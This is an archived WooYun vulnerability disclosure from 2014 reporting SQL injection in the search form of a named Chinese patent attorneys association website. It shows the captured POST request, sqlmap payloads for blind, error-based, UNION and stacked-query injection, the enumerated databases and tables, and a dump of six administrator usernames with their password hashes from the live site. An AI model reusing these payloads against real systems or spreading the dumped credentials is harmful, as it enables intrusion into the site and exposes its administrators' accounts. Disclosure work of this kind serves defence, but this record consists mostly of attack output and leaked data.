漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-058269
漏洞标题:中华全国专利代理人协会sql注入漏洞
相关厂商:中华全国专利代理人协会
漏洞作者: bitcoin
提交时间:2014-04-24 15:58
修复时间:2014-06-08 15:59
公开时间:2014-06-08 15:59
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-04-24: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-06-08: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
中华全国专利代理人协会sql注入漏洞
详细说明:
注入点:
首页http://www.acpaa.cn/的搜索处。
burp抓包
POST /search.asp HTTP/1.1
Host: www.acpaa.cn
Proxy-Connection: keep-alive
Content-Length: 42
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: http://www.acpaa.cn
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/29.0.1547.57 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.acpaa.cn/index.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASPSESSIONIDCSCBQCBB=LIJAJBBAKOICDBKGEEECPFBA
keyword=11&imageField.x=22&imageField.y=12
对keyword过滤不严,导致注入
请出sqlmap
Place: POST
Parameter: keyword
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: keyword=11%' AND 9752=9752 AND '%'='&imageField.x=22&imageField.y=12
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: keyword=11%' AND 6045=CONVERT(INT,(SELECT CHAR(113)+CHAR(97)+CHAR(1
05)+CHAR(100)+CHAR(113)+(SELECT (CASE WHEN (6045=6045) THEN CHAR(49) ELSE CHAR(4
8) END))+CHAR(113)+CHAR(111)+CHAR(106)+CHAR(121)+CHAR(113))) AND '%'='&imageFiel
d.x=22&imageField.y=12
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: keyword=-7378%' UNION ALL SELECT NULL,CHAR(113)+CHAR(97)+CHAR(105)+
CHAR(100)+CHAR(113)+CHAR(70)+CHAR(72)+CHAR(81)+CHAR(71)+CHAR(98)+CHAR(119)+CHAR(
88)+CHAR(76)+CHAR(87)+CHAR(122)+CHAR(113)+CHAR(111)+CHAR(106)+CHAR(121)+CHAR(113
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &imageField.x=22&imageField.y=12
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: keyword=11%'; WAITFOR DELAY '0:0:5'--&imageField.x=22&imageField.y=
12
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
available databases [8]:
[*] acpaanew
[*] agents_Association
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
Database: msdb
[82 tables]
+-----------------------------+
| RTblClassDefs |
| RTblDBMProps |
| RTblDBXProps |
| RTblDTMProps |
| RTblDTSProps |
| RTblDatabaseVersion |
| RTblEQMProps |
| RTblEnumerationDef |
| RTblEnumerationValueDef |
| RTblGENProps |
| RTblIfaceDefs |
| RTblIfaceHier |
| RTblIfaceMem |
| RTblMDSProps |
| RTblNamedObj |
| RTblOLPProps |
| RTblParameterDef |
| RTblPropDefs |
| RTblProps |
| RTblRelColDefs |
| RTblRelshipDefs |
| RTblRelshipProps |
| RTblRelships |
| RTblSIMProps |
| RTblScriptDefs |
| RTblSites |
| RTblSumInfo |
| RTblTFMProps |
| RTblTypeInfo |
| RTblTypeLibs |
| RTblUMLProps |
| RTblUMXProps |
| RTblVersionAdminInfo |
| RTblVersions |
| RTblWorkspaceItems |
| backupfile |
| backupmediafamily |
| backupmediaset |
| backupset |
| log_shipping_databases |
| log_shipping_monitor |
| log_shipping_plan_databases |
| log_shipping_plan_history |
| log_shipping_plans |
| log_shipping_primaries |
| log_shipping_secondaries |
| logmarkhistory |
| mswebtasks |
| restorefilegroup |
| restorefilegroup |
| restorehistory |
| sqlagent_info |
| sysalerts |
| syscachedcredentials |
| syscategories |
| sysconstraints |
| sysdbmaintplan_databases |
| sysdbmaintplan_history |
| sysdbmaintplan_jobs |
| sysdbmaintplans |
| sysdownloadlist |
| sysdtscategories |
| sysdtspackagelog |
| sysdtspackages |
| sysdtssteplog |
| sysdtstasklog |
| sysjobhistory |
| sysjobs_view |
| sysjobs_view |
| sysjobschedules |
| sysjobservers |
| sysjobsteps |
| sysnotifications |
| sysoperators |
| syssegments |
| systargetservergroupmembers |
| systargetservergroups |
| systargetservers_view |
| systargetservers_view |
| systaskids |
| systasks_view |
| systasks_view |
+-----------------------------+
Database: acpaanew
[35 tables]
+----------------+
| Adv |
| CG_Admin |
| CG_Config |
| News1 |
| News2 |
| News3 |
| News_cat1 |
| News_cat2 |
| agency_grade |
| agency_grade |
| agent_batch |
| agent_batch |
| agent_grade |
| agent_grant |
| apply_grade |
| apply_grade |
| area |
| course |
| dtproperties |
| essay |
| lawsuit |
| member |
| note |
| pay |
| project |
| record |
| register_error |
| register_error |
| sysconstraints |
| syssegments |
| tally |
| train_apply |
| train_apply |
| train_b |
| ymq_v_Channel |
+----------------+
Database: acpaanew
Table: CG_Admin
[7 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| admin | nvarchar |
| flag | ntext |
| ID | int |
| isadmin | int |
| lastlogin | datetime |
| rank | int |
| userpassword | nvarchar |
+--------------+----------+
Database: acpaanew
Table: CG_Admin
[6 entries]
+-------+----------------------------------+
| admin | userpassword |
+-------+----------------------------------+
| acpaa | 993E00ECB3FCE3C4F87C2F560375CA78 |
| cw | 827CCB0EEA8A706C4C34A16891F84E7B |
| dwjl | C4F9F48F8526F3F0680B3C26C4DE79EE |
| hy | 96E79218965EB72C92A549DD5A330112 |
| px | 379EF4BD50C30E261CCFB18DFC626D9F |
| xx | A926D4A5F5FF3F419907C92BC9523A91 |
+-------+----------------------------------+
漏洞证明:
如上
修复方案:
过滤
版权声明:转载请注明来源 bitcoin@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝